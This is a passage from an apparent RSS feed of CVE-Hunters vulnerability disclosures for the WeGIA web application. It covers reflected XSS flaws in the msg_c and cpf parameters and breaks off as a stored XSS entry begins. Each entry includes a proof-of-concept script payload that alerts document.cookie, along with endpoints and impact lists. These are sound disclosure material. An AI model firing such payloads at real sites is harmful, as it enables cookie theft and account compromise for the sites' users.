&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to validate and sanitize user inputs in the &amp;lt;code&amp;gt;msg_c&amp;lt;/code&amp;gt; parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user&amp;#39;s browser in the server&amp;#39;s response and executed within the context of the victim&amp;#39;s browser.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-22619-cross-site-scripting-xss-reflected-endpoint-editar_permissoesphp-parameter-msg_c&amp;#34;&amp;gt;CVE-2025-22619: Cross-Site Scripting (XSS) Reflected endpoint &amp;lt;code&amp;gt;editar_permissoes.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;msg_c&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-22619&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-22619&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;editar_permissoes.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the &amp;lt;code&amp;gt;msg_c&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;GET /html/geral/editar_permissoes.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;msg_c&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to validate and sanitize user inputs in the &amp;lt;code&amp;gt;msg_c&amp;lt;/code&amp;gt; parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user&amp;#39;s browser in the server&amp;#39;s response and executed within the context of the victim&amp;#39;s browser.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;document&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;cookie&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-22619/402269818-f31360e5-306f-426b-b4e5-8dc93352da38.png&amp;#34;
	width=&amp;#34;893&amp;#34;
	height=&amp;#34;303&amp;#34;
	srcset=&amp;#34;/p/cve-2025-22619/402269818-f31360e5-306f-426b-b4e5-8dc93352da38_hu_ae5a85c73166190.png 480w, /p/cve-2025-22619/402269818-f31360e5-306f-426b-b4e5-8dc93352da38_hu_ec3cf89ab4cc1f18.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;294&amp;#34;
		data-flex-basis=&amp;#34;707px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-22619/402269822-e17c5e3e-be98-417d-97fb-e5c5225e6fb1.png&amp;#34;
	width=&amp;#34;803&amp;#34;
	height=&amp;#34;249&amp;#34;
	srcset=&amp;#34;/p/cve-2025-22619/402269822-e17c5e3e-be98-417d-97fb-e5c5225e6fb1_hu_94b8dcce06577ba2.png 480w, /p/cve-2025-22619/402269822-e17c5e3e-be98-417d-97fb-e5c5225e6fb1_hu_2a94092c56f27d46.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;322&amp;#34;
		data-flex-basis=&amp;#34;773px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt; Reflected cross-site scripting (XSS) attacks can have serious consequences, including:
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;User actions: Attackers can perform any action the user can, such as viewing, modifying, or initiating interactions with other users.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Data theft: Attackers can exfiltrate data or install malware on the user&amp;#39;s machine.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Account compromise: Attackers can manipulate or steal cookies, or compromise confidential information.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Malicious code: Attackers can execute malicious code on the user&amp;#39;s system.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Business reputation damage: Attackers can deface a corporate website or spread misinformation.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirection: Attackers can change the instructions given to users, which can be dangerous if the target is a government website or provides vital resources.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-jfjj-7rgc-6j2m&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-jfjj-7rgc-6j2m&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributors&amp;#34;&amp;gt;Contributors
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/angelo-morette-019/code&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/angelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/angelo-morette-019/code&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Angelo Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/rafael50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Rafael Corvino&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 13 Jan 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-23030</title>
        <link>https://www.cvehunters.com/p/cve-2025-23030/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-23030/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-23030-cross-site-scripting-xss-reflected-endpoint-cadastro_funcionariophp-parameter-cpf&amp;#34;&amp;gt;CVE-2025-23030: Cross-Site Scripting (XSS) Reflected endpoint &amp;lt;code&amp;gt;cadastro_funcionario.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-23030&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-23030&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;cadastro_funcionario.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;GET /html/funcionario/cadastro_funcionario.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to validate and sanitize user inputs in the &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt; parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user&amp;#39;s browser in the server&amp;#39;s response and executed within the context of the victim&amp;#39;s browser.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-23030-cross-site-scripting-xss-reflected-endpoint-cadastro_funcionariophp-parameter-cpf&amp;#34;&amp;gt;CVE-2025-23030: Cross-Site Scripting (XSS) Reflected endpoint &amp;lt;code&amp;gt;cadastro_funcionario.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-23030&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-23030&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;cadastro_funcionario.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;GET /html/funcionario/cadastro_funcionario.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to validate and sanitize user inputs in the &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt; parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user&amp;#39;s browser in the server&amp;#39;s response and executed within the context of the victim&amp;#39;s browser.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;document&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;cookie&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-23030/402271163-e2150dc6-457b-4bf6-99fc-69c9924a51fe.png&amp;#34;
	width=&amp;#34;918&amp;#34;
	height=&amp;#34;317&amp;#34;
	srcset=&amp;#34;/p/cve-2025-23030/402271163-e2150dc6-457b-4bf6-99fc-69c9924a51fe_hu_c8e91ddf776d6051.png 480w, /p/cve-2025-23030/402271163-e2150dc6-457b-4bf6-99fc-69c9924a51fe_hu_101ae618a25ecc62.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;289&amp;#34;
		data-flex-basis=&amp;#34;695px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-23030/402271164-d511ae4b-88e1-4198-943d-62a8f81fe823.png&amp;#34;
	width=&amp;#34;806&amp;#34;
	height=&amp;#34;233&amp;#34;
	srcset=&amp;#34;/p/cve-2025-23030/402271164-d511ae4b-88e1-4198-943d-62a8f81fe823_hu_b90e40199c08726a.png 480w, /p/cve-2025-23030/402271164-d511ae4b-88e1-4198-943d-62a8f81fe823_hu_d1cbcefed7c53e69.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;345&amp;#34;
		data-flex-basis=&amp;#34;830px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt; Reflected cross-site scripting (XSS) attacks can have serious consequences, including:
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;User actions: Attackers can perform any action the user can, such as viewing, modifying, or initiating interactions with other users.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Data theft: Attackers can exfiltrate data or install malware on the user&amp;#39;s machine.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Account compromise: Attackers can manipulate or steal cookies, or compromise confidential information.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Malicious code: Attackers can execute malicious code on the user&amp;#39;s system.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Business reputation damage: Attackers can deface a corporate website or spread misinformation.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirection: Attackers can change the instructions given to users, which can be dangerous if the target is a government website or provides vital resources.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-88c9-gpgh-6vvrcode&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-88c9-gpgh-6vvrcode&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributors&amp;#34;&amp;gt;Contributors
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/angelo-morette-019/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/angelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/angelo-morette-019/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Angelo Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/rafael50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Rafael Corvino&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 13 Jan 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-23031</title>
        <link>https://www.cvehunters.com/p/cve-2025-23031/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-23031/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-23031-cross-site-scripting-xss-stored-endpoint-adicionar_alergiaphp-parameter-nome&amp;#34;&amp;gt;CVE-2025-23031: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;adicionar_alergia.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
